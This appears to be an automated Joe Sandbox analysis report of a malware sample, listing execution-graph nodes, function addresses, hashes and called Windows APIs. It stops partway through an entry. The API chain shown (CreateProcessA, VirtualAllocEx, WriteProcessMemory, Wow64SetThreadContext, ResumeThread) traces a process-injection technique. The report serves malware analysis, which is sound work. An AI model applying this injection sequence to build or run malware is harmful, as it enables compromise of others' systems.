                                                    • Opcode ID: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                    • Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
                                                    • Opcode Fuzzy Hash: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                    • Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6

                                                    Execution Graph

                                                    Execution Coverage:12%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:220
                                                    Total number of Limit Nodes:15
                                                    execution_graph 41936 779ace8 41937 779ac5a 41936->41937 41938 779adb3 41937->41938 41942 779c4c8 41937->41942 41957 779c50f 41937->41957 41973 779c4b8 41937->41973 41938->41938 41943 779c4e2 41942->41943 41946 779c506 41943->41946 41988 779d18f 41943->41988 41992 779caaf 41943->41992 42000 779cdab 41943->42000 42005 779d0f7 41943->42005 42009 779c8f7 41943->42009 42013 779cc3c 41943->42013 42019 779d0bd 41943->42019 42023 779cb5a 41943->42023 42029 779ca01 41943->42029 42034 779ca41 41943->42034 42039 779cbee 41943->42039 42044 779c9af 41943->42044 41946->41938 41958 779c513 41957->41958 41959 779c4b6 41957->41959 41958->41938 41960 779c506 41959->41960 41961 779cb5a 2 API calls 41959->41961 41962 779d0bd 2 API calls 41959->41962 41963 779cc3c 2 API calls 41959->41963 41964 779c8f7 2 API calls 41959->41964 41965 779d0f7 2 API calls 41959->41965 41966 779cdab 2 API calls 41959->41966 41967 779caaf 4 API calls 41959->41967 41968 779d18f 2 API calls 41959->41968 41969 779c9af 2 API calls 41959->41969 41970 779cbee 2 API calls 41959->41970 41971 779ca41 2 API calls 41959->41971 41972 779ca01 2 API calls 41959->41972 41960->41938 41961->41960 41962->41960 41963->41960 41964->41960 41965->41960 41966->41960 41967->41960 41968->41960 41969->41960 41970->41960 41971->41960 41972->41960 41974 779c4c8 41973->41974 41975 779c506 41974->41975 41976 779cb5a 2 API calls 41974->41976 41977 779d0bd 2 API calls 41974->41977 41978 779cc3c 2 API calls 41974->41978 41979 779c8f7 2 API calls 41974->41979 41980 779d0f7 2 API calls 41974->41980 41981 779cdab 2 API calls 41974->41981 41982 779caaf 4 API calls 41974->41982 41983 779d18f 2 API calls 41974->41983 41984 779c9af 2 API calls 41974->41984 41985 779cbee 2 API calls 41974->41985 41986 779ca41 2 API calls 41974->41986 41987 779ca01 2 API calls 41974->41987 41975->41938 41976->41975 41977->41975 41978->41975 41979->41975 41980->41975 41981->41975 41982->41975 41983->41975 41984->41975 41985->41975 41986->41975 41987->41975 41989 779d1b4 41988->41989 42049 779a659 41988->42049 42053 779a660 41988->42053 41993 779caf3 41992->41993 42057 7799f99 41993->42057 42061 7799fa0 41993->42061 41994 779c9c6 41994->41946 41995 779d1d3 41994->41995 42065 7799ae8 41994->42065 42069 7799ae0 41994->42069 41995->41946 42001 779cdb1 42000->42001 42073 779a568 42001->42073 42077 779a570 42001->42077 42002 779ce0b 42006 779d0bc 42005->42006 42006->42005 42007 7799f99 Wow64SetThreadContext 42006->42007 42008 7799fa0 Wow64SetThreadContext 42006->42008 42007->42006 42008->42006 42081 779a7f8 42009->42081 42085 779a7ec 42009->42085 42017 779a568 WriteProcessMemory 42013->42017 42018 779a570 WriteProcessMemory 42013->42018 42014 779d262 42014->41946 42015 779cc16 42015->42013 42015->42014 42016 779d2c2 42015->42016 42016->41946 42017->42015 42018->42015 42021 7799f99 Wow64SetThreadContext 42019->42021 42022 7799fa0 Wow64SetThreadContext 42019->42022 42020 779d0bc 42020->42019 42021->42020 42022->42020 42024 779cb60 42023->42024 42025 779d204 42024->42025 42027 779a568 WriteProcessMemory 42024->42027 42028 779a570 WriteProcessMemory 42024->42028 42026 779ce0b 42027->42026 42028->42026 42030 779c9e4 42029->42030 42031 779d1d3 42030->42031 42032 7799ae8 ResumeThread 42030->42032 42033 7799ae0 ResumeThread 42030->42033 42031->41946 42032->42030 42033->42030 42035 779d192 42034->42035 42037 779a659 ReadProcessMemory 42035->42037 42038 779a660 ReadProcessMemory 42035->42038 42036 779d1b4 42037->42036 42038->42036 42040 779cbfe 42039->42040 42042 779a568 WriteProcessMemory 42040->42042 42043 779a570 WriteProcessMemory 42040->42043 42041 779d075 42042->42041 42043->42041 42045 779c9b5 42044->42045 42046 779d1d3 42045->42046 42047 7799ae8 ResumeThread 42045->42047 42048 7799ae0 ResumeThread 42045->42048 42046->41946 42047->42045 42048->42045 42050 779a6ab ReadProcessMemory 42049->42050 42052 779a6ef 42050->42052 42052->41989 42054 779a6ab ReadProcessMemory 42053->42054 42056 779a6ef 42054->42056 42056->41989 42058 7799fe5 Wow64SetThreadContext 42057->42058 42060 779a02d 42058->42060 42060->41994 42062 7799fe5 Wow64SetThreadContext 42061->42062 42064 779a02d 42062->42064 42064->41994 42066 7799b28 ResumeThread 42065->42066 42068 7799b59 42066->42068 42068->41994 42070 7799b28 ResumeThread 42069->42070 42072 7799b59 42070->42072 42072->41994 42074 779a5b8 WriteProcessMemory 42073->42074 42076 779a60f 42074->42076 42076->42002 42078 779a5b8 WriteProcessMemory 42077->42078 42080 779a60f 42078->42080 42080->42002 42082 779a881 CreateProcessA 42081->42082 42084 779aa43 42082->42084 42086 779a881 CreateProcessA 42085->42086 42088 779aa43 42086->42088 42100 779d718 42101 779d8a3 42100->42101 42103 779d73e 42100->42103 42103->42101 42104 7799ce0 42103->42104 42105 779d998 PostMessageW 42104->42105 42106 779da04 42105->42106 42106->42103 41882 60a0888 41883 60a0889 41882->41883 41887 60a08c8 41883->41887 41892 60a08b9 41883->41892 41884 60a08a7 41888 60a08c9 41887->41888 41897 2c28c57 41888->41897 41903 2c27678 41888->41903 41889 60a092c 41889->41884 41893 60a08bc 41892->41893 41895 2c28c57 GetSystemMetrics 41893->41895 41896 2c27678 GetSystemMetrics 41893->41896 41894 60a092c 41894->41884 41895->41894 41896->41894 41898 2c28c8b 41897->41898 41900 2c28f13 41898->41900 41909 60a03b9 41898->41909 41899 2c28f51 41899->41889 41900->41899 41913 2c2d298 41900->41913 41904 2c27683 41903->41904 41906 2c28f13 41904->41906 41907 60a03b9 GetSystemMetrics 41904->41907 41905 2c28f51 41905->41889 41906->41905 41908 2c2d298 GetSystemMetrics 41906->41908 41907->41906 41908->41905 41910 60a036a GetSystemMetrics 41909->41910 41912 60a03c2 41909->41912 41911 60a038b 41910->41911 41911->41900 41912->41900 41914 2c2d2b9 41913->41914 41915 2c2d2dd 41914->41915 41917 2c2d448 41914->41917 41915->41899 41918 2c2d455 41917->41918 41920 2c2d48f 41918->41920 41921 2c2cfa8 41918->41921 41920->41915 41922 2c2cfb3 41921->41922 41924 2c2dda0 41922->41924 41925 2c2d0d4 41922->41925 41926 2c2d0df 41925->41926 41927 2c27678 GetSystemMetrics 41926->41927 41928 2c2de0f 41927->41928 41928->41924 42107 2c2b4e0 42108 2c2b522 42107->42108 42109 2c2b528 GetModuleHandleW 42107->42109 42108->42109 42110 2c2b555 42109->42110 42111 2c2d560 42112 2c2d5a6 GetCurrentProcess 42111->42112 42114 2c2d5f8 GetCurrentThread 42112->42114 42118 2c2d5f1 42112->42118 42115 2c2d635 GetCurrentProcess 42114->42115 42116 2c2d62e 42114->42116 42117 2c2d66b GetCurrentThreadId 42115->42117 42116->42115 42120 2c2d6c4 42117->42120 42118->42114 41929 758da10 41930 758da58 VirtualProtect 41929->41930 41931 758da92 41930->41931 42089 779ada1 42090 779ada7 42089->42090 42091 779acd8 42089->42091 42092 779adb3 42091->42092 42093 779c4c8 10 API calls 42091->42093 42094 779c4b8 10 API calls 42091->42094 42095 779c50f 10 API calls 42091->42095 42092->42092 42093->42092 42094->42092 42095->42092 42096 7580040 42097 758008e DrawTextExW 42096->42097 42099 75800e6 42097->42099 41932 779a4b0 41933 779a4f0 VirtualAllocEx 41932->41933 41935 779a52d 41933->41935 42121 2c24668 42122 2c2467a 42121->42122 42123 2c24686 42122->42123 42127 2c24783 42122->42127 42132 2c23e28 42123->42132 42125 2c246a5 42128 2c2479d 42127->42128 42136 2c24883 42128->42136 42140 2c24888 42128->42140 42133 2c23e33 42132->42133 42148 2c25c84 42133->42148 42135 2c27037 42135->42125 42137 2c248af 42136->42137 42139 2c2498c 42137->42139 42144 2c244b0 42137->42144 42141 2c248af 42140->42141 42142 2c2498c 42141->42142 42143 2c244b0 CreateActCtxA 42141->42143 42143->42142 42145 2c25918 CreateActCtxA 42144->42145 42147 2c259db 42145->42147 42147->42139 42149 2c25c8f 42148->42149 42152 2c25e5c 42149->42152 42151 2c27acd 42151->42135 42153 2c25e67 42152->42153 42156 2c27648 42153->42156 42155 2c27ba2 42155->42151 42157 2c27653 42156->42157 42158 2c27678 GetSystemMetrics 42157->42158 42159 2c27ca5 42158->42159 42159->42155 42160 2c2d7a8 DuplicateHandle 42161 2c2d83e 42160->42161

                                                    Executed Functions

                                                    Function 02C2D560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 526 2c2d560-2c2d5ef GetCurrentProcess 530 2c2d5f1-2c2d5f7 526->530 531 2c2d5f8-2c2d62c GetCurrentThread 526->531 530->531 532 2c2d635-2c2d669 GetCurrentProcess 531->532 533 2c2d62e-2c2d634 531->533 534 2c2d672-2c2d68a 532->534 535 2c2d66b-2c2d671 532->535 533->532 539 2c2d693-2c2d6c2 GetCurrentThreadId 534->539 535->534 540 2c2d6c4-2c2d6ca 539->540 541 2c2d6cb-2c2d72d 539->541 540->541
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02C2D5DE
                                                    • GetCurrentThread.KERNEL32 ref: 02C2D61B
                                                    • GetCurrentProcess.KERNEL32 ref: 02C2D658
                                                    • GetCurrentThreadId.KERNEL32 ref: 02C2D6B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID: PpTZ
                                                    • API String ID: 2063062207-3956381780
                                                    • Opcode ID: 89130409a651a13737b06a33138222c9c951771bf4bbf95c3aaa0dfcab194077
                                                    • Instruction ID: 4209697748b68817090e14a9b9fc39f87b297bc5ae9ec7396b5a966984a75671
                                                    • Opcode Fuzzy Hash: 89130409a651a13737b06a33138222c9c951771bf4bbf95c3aaa0dfcab194077
                                                    • Instruction Fuzzy Hash: A55154B09002498FDB14DFA9D548BEEBBF5FF88304F208559E019A7360DB38A944CF65
                                                    Function 0779A7EC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 654 779a7ec-779a88d 656 779a88f-779a899 654->656 657 779a8c6-779a8e6 654->657 656->657 658 779a89b-779a89d 656->658 662 779a8e8-779a8f2 657->662 663 779a91f-779a94e 657->663 660 779a89f-779a8a9 658->660 661 779a8c0-779a8c3 658->661 664 779a8ab 660->664 665 779a8ad-779a8bc 660->665 661->657 662->663 666 779a8f4-779a8f6 662->666 673 779a950-779a95a 663->673 674 779a987-779aa41 CreateProcessA 663->674 664->665 665->665 667 779a8be 665->667 668 779a919-779a91c 666->668 669 779a8f8-779a902 666->669 667->661 668->663 671 779a904 669->671 672 779a906-779a915 669->672 671->672 672->672 675 779a917 672->675 673->674 676 779a95c-779a95e 673->676 685 779aa4a-779aad0 674->685 686 779aa43-779aa49 674->686 675->668 678 779a981-779a984 676->678 679 779a960-779a96a 676->679 678->674 680 779a96c 679->680 681 779a96e-779a97d 679->681 680->681 681->681 682 779a97f 681->682 682->678 696 779aae0-779aae4 685->696 697 779aad2-779aad6 685->697 686->685 698 779aaf4-779aaf8 696->698 699 779aae6-779aaea 696->699 697->696 700 779aad8 697->700 702 779ab08-779ab0c 698->702 703 779aafa-779aafe 698->703 699->698 701 779aaec 699->701 700->696 701->698 705 779ab1e-779ab25 702->705 706 779ab0e-779ab14 702->706 703->702 704 779ab00 703->704 704->702 707 779ab3c 705->707 708 779ab27-779ab36 705->708 706->705 709 779ab3d 707->709 708->707 709->709
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779AA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: PpTZ$PpTZ
                                                    • API String ID: 963392458-3159420145
                                                    • Opcode ID: bfcd4cb6a7c582c7145272a82cf72971f65b445370d905f90c8b0e595fde31cf
                                                    • Instruction ID: 2893c7c4ac6f5e58e757273421376d1b832f966fc56f9922c66ad089209fc928
                                                    • Opcode Fuzzy Hash: bfcd4cb6a7c582c7145272a82cf72971f65b445370d905f90c8b0e595fde31cf
                                                    • Instruction Fuzzy Hash: A4A14AB1D0221ACFDF24CF68D841BEDBBB2BF48354F15856AD809A7240DB749986CF91
                                                    Function 0779A7F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 711 779a7f8-779a88d 713 779a88f-779a899 711->713 714 779a8c6-779a8e6 711->714 713->714 715 779a89b-779a89d 713->715 719 779a8e8-779a8f2 714->719 720 779a91f-779a94e 714->720 717 779a89f-779a8a9 715->717 718 779a8c0-779a8c3 715->718 721 779a8ab 717->721 722 779a8ad-779a8bc 717->722 718->714 719->720 723 779a8f4-779a8f6 719->723 730 779a950-779a95a 720->730 731 779a987-779aa41 CreateProcessA 720->731 721->722 722->722 724 779a8be 722->724 725 779a919-779a91c 723->725 726 779a8f8-779a902 723->726 724->718 725->720 728 779a904 726->728 729 779a906-779a915 726->729 728->729 729->729 732 779a917 729->732 730->731 733 779a95c-779a95e 730->733 742 779aa4a-779aad0 731->742 743 779aa43-779aa49 731->743 732->725 735 779a981-779a984 733->735 736 779a960-779a96a 733->736 735->731 737 779a96c 736->737 738 779a96e-779a97d 736->738 737->738 738->738 739 779a97f 738->739 739->735 753 779aae0-779aae4 742->753 754 779aad2-779aad6 742->754 743->742 755 779aaf4-779aaf8 753->755 756 779aae6-779aaea 753->756 754->753 757 779aad8 754->757 759 779ab08-779ab0c 755->759 760 779aafa-779aafe 755->760 756->755 758 779aaec 756->758 757->753 758->755 762 779ab1e-779ab25 759->762 763 779ab0e-779ab14 759->763 760->759 761 779ab00 760->761 761->759 764 779ab3c 762->764 765 779ab27-779ab36 762->765 763->762 766 779ab3d 764->766 765->764 766->766
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779AA2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: PpTZ$PpTZ
                                                    • API String ID: 963392458-3159420145
                                                    • Opcode ID: 86c79da637512c8d5b8aa7b51bb4e6640ea7387e6932a9bef42bc6db082e6987
                                                    • Instruction ID: 35ed9487805bb03ad8f6aa8676f261585f88df92fee6b66711cf8879d81233ac
                                                    • Opcode Fuzzy Hash: 86c79da637512c8d5b8aa7b51bb4e6640ea7387e6932a9bef42bc6db082e6987
                                                    • Instruction Fuzzy Hash: BA9149B1D0221ACFDF24CF68D841BEDBBB2BF48354F1585AAD809A7240DB749985CF91
                                                    Function 07580006 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075800D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID: PpTZ
                                                    • API String ID: 2175133113-3956381780
                                                    • Opcode ID: 914de044e32f82d681f2cd2a39053c6b85492a574b0af0348d64a5be89a5a74b
                                                    • Instruction ID: 2d4f4dc1c72881f5b04ca8f1f9f773cbf9ee09f78d7bdc2dc9de2784349f9a41
                                                    • Opcode Fuzzy Hash: 914de044e32f82d681f2cd2a39053c6b85492a574b0af0348d64a5be89a5a74b
                                                    • Instruction Fuzzy Hash: B23145B29053499FDB01CFA9D840ADEBFF4FF09220F14845AE458E7251C779A944CBA0
                                                    Function 02C244B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C259C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: PpTZ
                                                    • API String ID: 2289755597-3956381780
                                                    • Opcode ID: 37b4cbe7ecfcfd1992fd9d529d371de41c47382e77aa211529bc573fcabc6c39
                                                    • Instruction ID: 6e659c4d0c250469454804a69d15acb183e28a3a1bc399e7587e7913825ed563
                                                    • Opcode Fuzzy Hash: 37b4cbe7ecfcfd1992fd9d529d371de41c47382e77aa211529bc573fcabc6c39
                                                    • Instruction Fuzzy Hash: 6041D4B0C00719CBDB25DFA9C844BDEBBB5BF49304F60806AD409AB255DB75594ACF90
                                                    Function 02C25917 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02C259C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID: PpTZ
                                                    • API String ID: 2289755597-3956381780
                                                    • Opcode ID: d0c8a054cba482493849b0b714d528f3712e2d98262b6cf16e7b18b1b1495c3d
                                                    • Instruction ID: 6e394b5b88623a1b2252975139330a7b8f716afaa4bd11f27725985f1cc9cca3
                                                    • Opcode Fuzzy Hash: d0c8a054cba482493849b0b714d528f3712e2d98262b6cf16e7b18b1b1495c3d
                                                    • Instruction Fuzzy Hash: 5241F3B0C00719CEDB28DFA9C885BDEBBF5BF48304F64806AD409AB255DB75594ACF90
                                                    Function 0779A568 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0779A600
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID: PpTZ
                                                    • API String ID: 3559483778-3956381780
                                                    • Opcode ID: 1cd55c9b44b86fc4bc9f79ce01215f1f083809b2ef6d580d5cf20fc98c10a20c
                                                    • Instruction ID: 3c2ccdc7ec1a5f97d217e0ae18f35f87bf9989ffa026582d864368cf65c04bef
                                                    • Opcode Fuzzy Hash: 1cd55c9b44b86fc4bc9f79ce01215f1f083809b2ef6d580d5cf20fc98c10a20c
                                                    • Instruction Fuzzy Hash: B22115B59012599FCF10CFA9D885BEEBFF5FF48314F10882AE959A7240C7789945CBA0
                                                    Function 07580040 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075800D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID: PpTZ
                                                    • API String ID: 2175133113-3956381780
                                                    • Opcode ID: e1007928de832b4e1756f7ff51471e99ae28d7420d17506c9ddd9ba0f503f013
                                                    • Instruction ID: 83ebf4fd041c89ba97289c9cf21c8a4019d4bea46d986af283aae92b45c2c4f1
                                                    • Opcode Fuzzy Hash: e1007928de832b4e1756f7ff51471e99ae28d7420d17506c9ddd9ba0f503f013
                                                    • Instruction Fuzzy Hash: 8B21E3B59012099FDB10DF9AD880ADEFBF4FB48310F14842AE819A7250C375A544CFA0
                                                    Function 0779A570 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0779A600
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID: PpTZ
                                                    • API String ID: 3559483778-3956381780
                                                    • Opcode ID: 586e29f71e5aaa2312139bfe23075a03183016b3a01f8fa4a3156da44802e1df
                                                    • Instruction ID: 41769bb239eb1a751439ceccf551821bfe8818f1b747e43e353161e8887761e1
                                                    • Opcode Fuzzy Hash: 586e29f71e5aaa2312139bfe23075a03183016b3a01f8fa4a3156da44802e1df
                                                    • Instruction Fuzzy Hash: 9E2107B59013599FCF10DFAAC885BEEBBF5FF48314F108829E919A7240C7789944CBA4
                                                    Function 0779A659 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0779A6E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID: PpTZ
                                                    • API String ID: 1726664587-3956381780
                                                    • Opcode ID: 643793e82f2e0af0fb4d0623a184b049148321917160aefca605ad18764a70d7
                                                    • Instruction ID: f2488fb6b8e28c09d2b76e68fd97bf140738690aa3d8f3a5f854567bb6e73c91
                                                    • Opcode Fuzzy Hash: 643793e82f2e0af0fb4d0623a184b049148321917160aefca605ad18764a70d7
                                                    • Instruction Fuzzy Hash: D32105B1C012499FCF10DFAAC881AEEBBF5FF48310F10882AE559A7240C7799945CFA0
                                                    Function 07799F99 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0779A01E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID: PpTZ
                                                    • API String ID: 983334009-3956381780
                                                    • Opcode ID: 849b551dce2b735849798989d270ecf85b5a14e6387280370c618278af86cc6a
                                                    • Instruction ID: dc9ffd44c3d8b0344a1df6f12abe9295c8aa332cc6dc98deab55375271952f34
                                                    • Opcode Fuzzy Hash: 849b551dce2b735849798989d270ecf85b5a14e6387280370c618278af86cc6a
                                                    • Instruction Fuzzy Hash: DD2128B1D002098FDB10DFAAC485BEEBFF5EF48314F14842AD559A7240DB789945CFA0
                                                    Function 0779A660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0779A6E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID: PpTZ
                                                    • API String ID: 1726664587-3956381780
                                                    • Opcode ID: cf5ba48b2b2e612c64faedd1639178d56a09332b1d6af499c6d280a605a13df1
                                                    • Instruction ID: 09970c12de72f65cc6520b9944685fdd2ebf556ca716190b226e132b0e416934
                                                    • Opcode Fuzzy Hash: cf5ba48b2b2e612c64faedd1639178d56a09332b1d6af499c6d280a605a13df1
                                                    • Instruction Fuzzy Hash: 1E2128B1C012499FCB10DFAAC841AEEFBF5FF48310F108429E519A7240C7799940CBA0
                                                    Function 07799FA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0779A01E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID: PpTZ
                                                    • API String ID: 983334009-3956381780
                                                    • Opcode ID: 140a6ba66dce9a6695904ac9f6a437b464f2af03953817217fa2a1cce71b5b13
                                                    • Instruction ID: 99bda207f853b4dfa78e50db196c789cad5c69ce2134c8ab0567aa4115778d43
                                                    • Opcode Fuzzy Hash: 140a6ba66dce9a6695904ac9f6a437b464f2af03953817217fa2a1cce71b5b13
                                                    • Instruction Fuzzy Hash: C12104B19003098FDB10DFAAC485BAEBBF5EF88354F14842AD559A7240DB78A945CFA1
                                                    Function 02C2D7A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C2D82F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID: PpTZ
                                                    • API String ID: 3793708945-3956381780
                                                    • Opcode ID: c8e2717c60f607292d3024a56017578bef95c639a576322e921de392eb8d2f12
                                                    • Instruction ID: 190040451c47f5a4a662a4fd7829a01994f43799a7544dbb6f18bd2fe716f03c
                                                    • Opcode Fuzzy Hash: c8e2717c60f607292d3024a56017578bef95c639a576322e921de392eb8d2f12
                                                    • Instruction Fuzzy Hash: E221E3B59002089FDB10CFAAD584ADEBBF8FB48710F14841AE918A3210D378A944CFA0
                                                    Function 0758DA0A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0758DA83
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: PpTZ
                                                    • API String ID: 544645111-3956381780
                                                    • Opcode ID: b43c15db263a97ab2dccc406742773284339fe1af4d32023dcb23f85736583d7
                                                    • Instruction ID: 9289cf1e88863d3c6e6438c9932600fb31149885f0c0f55f04f39297a6d475c6
                                                    • Opcode Fuzzy Hash: b43c15db263a97ab2dccc406742773284339fe1af4d32023dcb23f85736583d7
                                                    • Instruction Fuzzy Hash: DE2106B59002499FCB10DFAAD444BDEFBF4FB48320F10842AE958A7650D778A644CFA1
                                                    Function 0779A4A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0779A51E
                                                    Strings
                                                    Memory Dump Source
